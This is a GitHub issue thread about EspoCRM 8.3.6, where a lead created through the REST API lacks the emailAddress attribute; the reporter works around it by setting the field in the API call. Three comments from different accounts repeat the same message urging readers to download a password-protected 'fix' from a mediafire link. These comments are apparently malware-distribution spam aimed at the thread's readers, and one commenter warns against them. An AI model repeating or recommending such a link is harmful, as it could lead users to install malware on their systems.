### ISSUE TITLE
emailAddress is not set if lead is created via API

### ISSUE THREAD

**Issue by tim-bezhashvyly** [espocrm/espocrm#3130]
**Describe the bug**
I'm not sure if it is an intended behavior but if I create a lead via REST API the email address is added to `emailAddressData` array but not on the object itself. I have dumped the lead object inside of `afterSave` hook. At the screenshot below left is a lead created via UI, right via API

**To Reproduce (MANDATORY, DO NOT REMOVE)**
Explicit steps to reproduce the behavior:
1. Create a lead via API

**Expected behavior**
`emailAddress` attribute is set on the lead object

**Screenshots**
<img width="1002" alt="Screenshot 1" src="https://github.com/user-attachments/assets/093cfaa6-c356-43a8-b47b-17fd71abbf74">

**EspoCRM version**
8.3.6

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by arkadiyasuratov** [comment]
If this is not obvious, please do not download any suspicious links.

**Comment by tim-bezhashvyly** [comment]
I worked around it by explicitly setting `emailAddress` at my API call
